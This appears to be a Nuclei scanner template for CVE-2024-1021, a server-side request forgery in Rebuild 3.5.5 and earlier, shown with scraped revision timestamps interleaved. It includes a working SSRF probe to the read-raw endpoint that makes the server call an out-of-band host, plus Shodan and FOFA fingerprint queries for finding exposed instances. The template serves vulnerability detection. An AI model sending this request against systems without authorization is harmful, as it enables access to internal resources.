2024-02-25 04:56:05 +00:00
id : CVE-2024-1021
info :
name : Rebuild <= 3.5.5 - Server-Side Request Forgery
author : BMCel
2024-03-23 09:28:19 +00:00
severity : critical
2024-02-25 04:56:05 +00:00
description : |
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
impact : |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
remediation : |
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
2024-03-23 09:28:19 +00:00
reference :
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
- https://vuldb.com/?ctiid.252290
- https://vuldb.com/?id.252290
- https://github.com/tanjiti/sec_profile
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-1021
cwe-id : CWE-918
2024-06-07 10:04:29 +00:00
epss-score : 0.00973
epss-percentile : 0.83349
2024-03-23 09:28:19 +00:00
cpe : cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*
2024-02-25 04:56:05 +00:00
metadata :
2024-02-25 09:00:15 +00:00
verified : true
2024-03-23 09:28:19 +00:00
max-request : 2
vendor : ruifang-tech
product : rebuild
2024-05-31 19:23:20 +00:00
shodan-query : http.favicon.hash:"871154672"
2024-06-07 10:04:29 +00:00
fofa-query : "icon_hash=\"871154672\""
tags : cve2024,cve,rebuild,ssrf,ruifang-tech
2024-02-25 04:56:05 +00:00
http :
2024-02-25 09:00:15 +00:00
- method : GET
path :
- "{{BaseURL}}"
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
2024-02-25 04:56:05 +00:00
matchers :
2024-02-25 09:00:15 +00:00
- type : dsl
dsl :
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
- 'status_code_2 == 200'
condition : and
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100ecd416627d1c6165d69bef643a983b65fafaabe6417bb79944e15af02b39b03f022100a5ed6b41e0bf5736e99ed54d1c1a53abe9956c3b773c3cf65c24507b7d2087eb:922c64590222798bb761d5b6d8e72950